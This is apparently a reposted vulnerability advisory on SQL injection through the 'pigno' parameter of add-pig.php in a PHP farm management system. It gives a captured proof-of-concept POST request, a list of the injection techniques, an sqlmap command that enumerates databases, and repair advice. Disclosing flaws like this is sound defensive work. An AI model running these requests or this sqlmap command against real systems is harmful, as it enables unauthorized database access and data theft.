Itsourcecode Farm Management System In PHP v1.0 add-pig.php SQL injection
AFFECTED AND/OR FIXED VERSION(S)
submitter
Vulnerable File
VERSION(S)
PROBLEM TYPE
Vulnerability Type
Root Cause
- A SQL injection vulnerability was found in the ‘add-pig.php’ file of the ‘Farm Management System In PHP’ project. The reason for this issue is that attackers inject malicious code from the parameter “pigno” and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
Impact
- Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
DESCRIPTION
- Due to insufficient user input verification for the “pigno” parameter, a serious SQL injection vulnerability has been discovered in the login function of the “Farm Management System In PHP”, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity.
Vulnerability details and POC
- POST /add-pig.php HTTP/1.1
- Host: 192.168.1.136:1219
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- Accept-Encoding: gzip, deflate, br
- Content-Type: multipart/form-data; boundary=---------------------------359458591942496535511331165261
- Content-Length: 1199
- Origin: http://192.168.1.136:1219
- Connection: close
- Referer: http://192.168.1.136:1219/add-pig.php
- Cookie: pma_lang=zh_CN; pmaUser-1=%7B%22iv%22%3A%227LWOmQxn1kFNKDQIKEqUQQ%3D%3D%22%2C%22mac%22%3A%22f46715269295f7bc9c1753cf49cb29de885e0738%22%2C%22payload%22%3A%22uwlGMpERga3ktRQQmcLQUg%3D%3D%22%7D; PHPSESSID=4j8anjs7rlcs27867bnlmj1116; phpMyAdmin=5r1opuf2mqc9j30vli7mfrhvtt; pmaAuth-1=%7B%22iv%22%3A%22HbgyCK8mDtH6Yh3l1rTCWw%3D%3D%22%2C%22mac%22%3A%226259e5b1095aeff224b50540aea65c624fb900c9%22%2C%22payload%22%3A%22SiwuQJzR6qfxiA6velzoYRz%2BXnITRHrg37ZL9M1sbb0%3D%22%7D
- Upgrade-Insecure-Requests: 1
- Priority: u=1
- -----------------------------359458591942496535511331165261
- Content-Disposition: form-data; name="pigno"
- pig-fms-5320
- -----------------------------359458591942496535511331165261
- Content-Disposition: form-data; name="weight"
- 123
- -----------------------------359458591942496535511331165261
- Content-Disposition: form-data; name="arrived"
- 2024-06-01
- -----------------------------359458591942496535511331165261
- Content-Disposition: form-data; name="gender"
- male
- -----------------------------359458591942496535511331165261
- Content-Disposition: form-data; name="status"
- active
- -----------------------------359458591942496535511331165261
- Content-Disposition: form-data; name="breed"
- 1
- -----------------------------359458591942496535511331165261
- Content-Disposition: form-data; name="remark"
- 123
- -----------------------------359458591942496535511331165261
- Content-Disposition: form-data; name="pigphoto"; filename="123.php"
- Content-Type: application/octet-stream
- -----------------------------359458591942496535511331165261
- Content-Disposition: form-data; name="submit"
- -----------------------------359458591942496535511331165261--
复制代码 Vulnerability type:
- time-based blind
- boolean-based blind
- error-based
- stacked queries
Vulnerability location:
Payload:

The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
- sqlmap -r 123 --batch --dbs
复制代码
Suggested repair
- Use prepared statements and parameter binding:
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
- Input validation and filtering:
Strictly validate and filter user input data to ensure it conforms to the expected format.
- Minimize database user permissions:
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as’ root ‘or’ admin ') for daily operations.
- Regular security audits:
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 |